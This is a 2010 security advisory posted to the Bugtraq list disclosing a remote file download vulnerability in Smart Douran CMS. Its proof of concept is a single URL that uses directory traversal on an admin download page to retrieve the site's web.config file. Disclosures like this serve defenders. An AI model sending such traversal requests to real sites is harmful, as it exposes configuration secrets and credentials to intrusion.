
Date: 19 May 2010 07:23:42 -0000
From: info@...uritylab.ir
To: bugtraq@...urityfocus.com
Subject: Smart Douran CMS Remote File Download

#################################################################  
# Securitylab.ir  
#################################################################  
# Application Info:  
# Name: Smart Douran CMS
# Vendor: http://smartdouran.ir
#################################################################  
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
# 2008-08-11 - Found Vulnerability
# 2010-05-19 - Public disclosure
#################################################################
Vulnerability:  
http://site.com/Admin/ImportExport/Download.aspx?filename=../../web.config 
#################################################################  
# Discoverd By: Pouya Daneshmand  
# Website: http://Pouya.Securitylab.ir  
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################
